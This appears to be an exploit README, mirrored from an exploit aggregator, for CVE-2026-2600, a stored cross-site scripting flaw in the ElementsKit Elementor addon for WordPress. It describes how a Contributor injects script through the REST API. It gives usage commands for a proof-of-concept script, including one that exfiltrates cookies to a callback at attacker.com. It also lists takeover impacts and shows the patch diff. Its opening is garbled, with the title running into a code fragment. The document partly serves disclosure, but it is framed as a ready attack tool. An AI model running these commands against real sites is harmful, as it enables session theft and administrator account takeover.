Share
## https://sploitus.com/exploit?id=DD99D3D7-A2B3-50BE-AB9E-D45FFF4E8621
# CVE-2026-2600

**ElementsKit Elementor Addons  $item ) {
    echo '' . $item['ekit_tab_title'] . '';
}
```

Elementor's editor sanitizes input on the client side, but the REST API endpoint (`/wp-json/wp/v2/posts/{id}`) accepts the `_elementor_data` meta field directly and bypasses that layer entirely.

An authenticated Contributor can PATCH a post with a crafted Elementor JSON payload that sets `ekit_tab_title` to arbitrary HTML. Because the value is stored verbatim in `_elementor_data` and echoed without `esc_html()` at render time, the script executes in every visitor's browser when the page loads.

## Impact

Any Contributor can:
- Steal session cookies and authentication tokens from all site visitors, including administrators
- Hijack admin accounts and escalate to full site takeover
- Deploy keyloggers or credential-harvesting overlays silently
- Redirect visitors to phishing pages or malware distribution sites
- Deface pages persistently โ€” payload survives until manually removed

400K+ active installs were affected at disclosure time.

## Usage

```bash
pip install requests
python3 poc.py https://target.com contributor p4ss
```

The script authenticates over HTTP, fetches the REST nonce from the admin editor, creates a draft post, patches `_elementor_data` with the XSS payload embedded in the `ekit_tab_title` field, and publishes the post. Output confirms whether the payload is live in the page source.

```bash
# Custom payload
python3 poc.py https://target.com contributor p4ss --payload 'alert(document.domain)'

# Cookie exfiltration with callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Interactive console mode
python3 console_poc.py
```

## Demo



## Full writeup

https://folks-iwd.github.io/writeups/cve-2026-2600.html

## Disclosure timeline

| Date | Event |
|------|-------|
| January 2026 | Discovered via SVN diff review. PoC confirmed. |
| January 2026 | Reported to Patchstack Alliance with full writeup and PoC. |
| March 2026 | Wpmet shipped the fix in v3.8.0. |
| April 2026 | CVE-2026-2600 published. CVSS 6.4 MEDIUM assigned. |

## The patch

Wpmet added `esc_html()` around the tab title output in `widgets/tab/tab.php`:

```php
- echo '' . $item['ekit_tab_title'] . '';
+ echo '' . esc_html( $item['ekit_tab_title'] ) . '';
```